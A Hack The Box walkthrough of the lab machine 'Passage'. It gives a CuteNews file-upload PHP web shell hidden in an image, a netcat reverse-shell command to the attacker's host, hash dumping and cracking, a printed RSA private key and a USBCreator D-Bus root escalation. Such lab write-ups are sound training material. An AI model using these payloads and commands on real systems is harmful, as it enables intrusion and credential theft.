Hack-The-Box-walkthrough[passage]

Posted on 2020-09-07 Edited on 2021-03-09 In HackTheBox walkthrough Views: Word count in article: 1.3k Reading time ≈ 5 mins.

introduce

OS: Linux
Difficulty: Medium
Points: 30
Release: 05 Sep 2020
IP: 10.10.10.206

User Blood qtc 00 days, 00 hours, 19 mins, 35 seconds.
Root Blood Lemming 00 days, 00 hours, 32 mins, 04 seconds.

information gathering

first use nmap as usaul

root@kali:~# nmap -sV -v -p- --min-rate=10000 10.10.10.206
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))

from the page we know about NMS (News Management System) Cutenews.

1	Powered by CuteNews

After some googling, I found that we can visit the NMS panel after placing CuteNews on the web page.

1	http://10.10.10.206/CuteNews/

first regist then sign in,but nothing interesting,then got the version of CuteNews in the same page.

1 2	Powered by CuteNews 2.1.2 © 2002–2020 CutePHP. (unregistered)

CVE – Arbitrary File Upload – www-data Shell

A simple Googling we found

CuteNews 2.0.3 - Arbitrary File Upload

Based on the reference above, we can upload a malicious JPG file containing malicious PHP code in it to cause RCE.

we can writeup our PHP code inside an image file using the ExifTool tool.

root@kali:~/hackthebox/machine/passage# exiftool -comment='<?php echo system($_GET['cmd']); ?>' test.jpg
    1 image files updated
root@kali:~/hackthebox/machine/passage# exiftool test.jpg
ExifTool Version Number         : 12.04
File Name                       : test.jpg
Directory                       : .
File Size                       : 63 kB
File Modification Date/Time     : 2020:09:07 01:59:53-04:00
File Access Date/Time           : 2020:09:07 01:59:53-04:00
File Inode Change Date/Time     : 2020:09:07 01:59:53-04:00
File Permissions                : rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : inches
X Resolution                    : 72
Y Resolution                    : 72
Comment                         : <?php echo system($_GET[cmd]); ?>
Image Width                     : 780
Image Height                    : 1380
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 780x1380
Megapixels                      : 1.1

then change the extension to .php and register an account and upload it to the avatar section.

visit

1	http://10.10.10.206/CuteNews/index.php?mod=main&opt=personal

After saving changes, we can now able to visit the location of our uploaded PHP file.

1	http://10.10.10.206/CuteNews/uploads/avatar_lucifer_test.php?cmd=id

and we got the following on browser

1	uid=33(www-data) gid=33(www-data) groups=33(www-data) uid=33(www-data) gid=33(www-data) groups=33(www-data)

After Some Enumeration found that NC is available in machiene.

executed this command to get a reverse shell

1	nc 10.10.14.4 4455 -e /bin/bash

and we got a reverse shell

root@kali:~# nc -lvp 4455
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4455
Ncat: Listening on 0.0.0.0:4455
Ncat: Connection from 10.10.10.206.
Ncat: Connection from 10.10.10.206:34760.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@passage:/var/www/html/CuteNews/uploads$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@passage:/var/www/html/CuteNews/uploads$ whoami
whoami
www-data

there is a lot of PHP files available to read. saved all the outputs to a single file and copied it to my machine.

www-data@passage:/var/www/html/CuteNews/cdata/users$ ls
ls
09.php  21.php  52.php  6e.php  7a.php  b0.php  d4.php  fc.php
0a.php  32.php  5d.php  75.php  8f.php  c8.php  d5.php  lines
16.php  49.php  66.php  77.php  97.php  ca.php  d6.php  users.txt
www-data@passage:/var/www/html/CuteNews/cdata/users$ cat * > output.txt
cat * > output.txt

base64 decode those strings, got 7 SHA2-256 Hashes. use Hashcat to crack this against with rockyou.txt file.

7144a8b531c27a60b51d81ae16be3a81cef722e11b43a26fde0ca97f9e1485e1
4bdd0a0bb47fc9f66cbf1a8982fd2d344d2aec283d1afaebb4653ec3954dff88
e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd
f669a6f691f98ab0562356c0cd5d5e7dcdc20a07941c86adcfce9af3085fbeca
6e9d6c8d194aad647a7b5e1ecd47c7ca24f042a772fb3802e4b81e6043d67817
4db1f0bfd63be058d4ab04f18f65331ac11bb494b5792c480faf7fb0c40fa9cc
e7d3685715939842749cc27b38d0ccb9706d4d14a5304ef9eee093780eab5df9

1	hashcat64.exe -m 1400 -a 0 output.txt rockyou.txt

and we cracked 2 hashes:

1 2	e7d3685715939842749cc27b38d0ccb9706d4d14a5304ef9eee093780eab5df9:hacker e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd:atlanta1

SSH is not allowed to log in with Password. So I tried to SU into Paul.

username : paul
password : atlanta1

www-data@passage:/var/www/html/CuteNews/cdata/users$ su paul
su paul
Password: atlanta1

paul@passage:/var/www/html/CuteNews/cdata/users$ cd ~
cd ~
paul@passage:~$ ls
ls
Desktop    Downloads         Music     Public     user.txt
Documents  examples.desktop  Pictures  Templates  Videos
paul@passage:~$ cat user.txt
cat user.txt
7b75a13dc30044026e830c894aaf83c0

and we got user.txt

got root

We Can Cat SSH Keys Of Nadav, because Nadav uses the same SSH key for Paul.

paul@passage:~/.ssh$ cat id_rsa
cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAs14rHBRld5fU9oL1zpIfcPgaT54Rb+QDj2oAK4M1g5PblKu/
+L+JLs7KP5QL0CINoGGhB5Q3aanfYAmAO7YO+jeUS266BqgOj6PdUOvT0GnS7M4i
Z2Lpm4QpYDyxrgY9OmCg5LSN26Px948WE12N5HyFCqN1hZ6FWYk5ryiw5AJTv/kt
rWEGu8DJXkkdNaT+FRMcT1uMQ32y556fczlFQaXQjB5fJUXYKIDkLhGnUTUcAnSJ
JjBGOXn1d2LGHMAcHOof2QeLvMT8h98hZQTUeyQA5J+2RZ63b04dzmPpCxK+hbok
sjhFoXD8m5DOYcXS/YHvW1q3knzQtddtqquPXQIDAQABAoIBAGwqMHMJdbrt67YQ
eWztv1ofs7YpizhfVypH8PxMbpv/MR5xiB3YW0DH4Tz/6TPFJVR/K11nqxbkItlG
QXdArb2EgMAQcMwM0mManR7sZ9o5xsGY+TRBeMCYrV7kmv1ns8qddMkWfKlkL0lr
lxNsimGsGYq10ewXETFSSF/xeOK15hp5rzwZwrmI9No4FFrX6P0r7rdOaxswSFAh
zWd1GhYk+Z3qYUhCE0AxHxpM0DlNVFrIwc0DnM5jogO6JDxHkzXaDUj/A0jnjMMz
R0AyP/AEw7HmvcrSoFRx6k/NtzaePzIa2CuGDkz/G6OEhNVd2S8/enlxf51MIO/k
7u1gB70CgYEA1zLGA35J1HW7IcgOK7m2HGMdueM4BX8z8GrPIk6MLZ6w9X6yoBio
GS3B3ngOKyHVGFeQrpwT1a/cxdEi8yetXj9FJd7yg2kIeuDPp+gmHZhVHGcwE6C4
IuVrqUgz4FzyH1ZFg37embvutkIBv3FVyF7RRqFX/6y6X1Vbtk7kXsMCgYEA1WBE
LuhRFMDaEIdfA16CotRuwwpQS/WeZ8Q5loOj9+hm7wYCtGpbdS9urDHaMZUHysSR
AHRFxITr4Sbi51BHUsnwHzJZ0o6tRFMXacN93g3Y2bT9yZ2zj9kwGM25ySizEWH0
VvPKeRYMlGnXqBvJoRE43wdQaPGYgW2bj6Ylt18CgYBRzSsYCNlnuZj4rmM0m9Nt
1v9lucmBzWig6vjxwYnnjXsW1qJv2O+NIqefOWOpYaLvLdoBhbLEd6UkTOtMIrj0
KnjOfIETEsn2a56D5OsYNN+lfFP6Ig3ctfjG0Htnve0LnG+wHHnhVl7XSSAA9cP1
9pT2lD4vIil2M6w5EKQeoQKBgQCMMs16GLE1tqVRWPEH8LBbNsN0KbGqxz8GpTrF
d8dj23LOuJ9MVdmz/K92OudHzsko5ND1gHBa+I9YB8ns/KVwczjv9pBoNdEI5KOs
nYN1RJnoKfDa6WCTMrxUf9ADqVdHI5p9C4BM4Tzwwz6suV1ZFEzO1ipyWdO/rvoY
f62mdwKBgQCCvj96lWy41Uofc8y65CJi126M+9OElbhskRiWlB3OIDb51mbSYgyM
Uxu7T8HY2CcWiKGe+TEX6mw9VFxaOyiBm8ReSC7Sk21GASy8KgqtfZy7pZGvazDs
OR3ygpKs09yu7svQi8j2qwc7FL6DER74yws+f538hI7SHBv9fYPVyw==
-----END RSA PRIVATE KEY-----

and now we are nadav

root@kali:~/hackthebox/machine/passage# ssh -i nadav-key nadav@10.10.10.206
load pubkey "nadav-key": invalid format
The authenticity of host '10.10.10.206 (10.10.10.206)' can't be established.
ECDSA key fingerprint is SHA256:oRyj2rNWOCrVh9SCgFGamjppmxqJUlGgvI4JSVG75xg.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.206' (ECDSA) to the list of known hosts.
Last login: Mon Aug 31 15:07:54 2020 from 127.0.0.1
nadav@passage:~$ id
uid=1000(nadav) gid=1000(nadav) groups=1000(nadav),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
nadav@passage:~$ whoami
nadav

Dbus – USB Controller Privilege Escalation – Root

Listing all the process gave me a hint for Root.

1 2	nadav@passage:~$ ps -aux \| grep usb nadav 3430 0.0 0.0 21264 1028 pts/19 S+ 00:14 0:00 grep --color=auto usb

reference to USBCreator D-Bus Privilege Escalation in Ubuntu Desktop

Pre Requirements:

The user must be in the Sudoers group. Here in our case, Nadav is in the Sudoers group.
The user must have executable privileges to the dbus tool.

1 2	nadav@passage:~$ find / -perm -u=s -type f 2>/dev/null \| grep dbus /usr/lib/dbus-1.0/dbus-daemon-launch-helper

then We have everything we need.
it’s time to launch our attack. As we already know the dbus system block as com.ubuntu.USBCreator by default, we can send a system call to Dbus message.

1
2
3

nadav@passage:~$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDMR1r7B7aiEe6j+wBsVumAFqFXCiqw2iSrcg1S7rC1BdlVqr8YfWnT6e/e3+TAJk9idtLz/wN2MkupWtI1ddtNTJz31RQb0WMGjq7p8Usg0uIYhQH0PTN/GmPXDhqLIPcbTnNQMcV2PnwM07eXxQH0+s9rqVO8cR2z2f35bKe3WrHNnT7NwfOoWqNJxh+V8OGgfF8LhS0E46I6co76MJAIsX24Zs9r/dY+JPOlJlS3K2Kf3xSfPAScQeWip1WYY9depVuQywk12kOUikzGNjlQ4phNba47VjfycyV34cLw0/vQcDv5hMCfaK+hoE5rBXysnVx/f3n3zRYMLomgveQUCLBYUwJPE2t0VzeeX4W9wxrAOl2Njx5TI4cEFnmlp/6lO/iK+aC6BSBRxU19jS2fUchiN9PMgLSYGzhuIxOLvvd9AlaOYPNM7a5AfjzzO+gd1fv/Mb9EIZCKibtvpHp0eomnSDcDz/b9FNpbvg6V5NBVy2VaufcRbiBDD6cTS00= root@kali" > ~/authorized_keys
nadav@passage:~$ gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /home/nadav/authorized_keys /root/.ssh/authorized_keys true
()

we did all the things without getting any errors. Let’s try to SSH into Root.

root@kali:~/hackthebox/machine/passage# chmod 600 id_rsa 
root@kali:~/hackthebox/machine/passage# ssh -i id_rsa root@10.10.10.206
Last login: Mon Aug 31 15:14:22 2020 from 127.0.0.1
root@passage:~# id
uid=0(root) gid=0(root) groups=0(root)
root@passage:~# whoami
root
root@passage:~# ls
artifacts  files  root.txt
root@passage:~# cat root.txt
5bceb602f952cda2b0db04c27331c2eb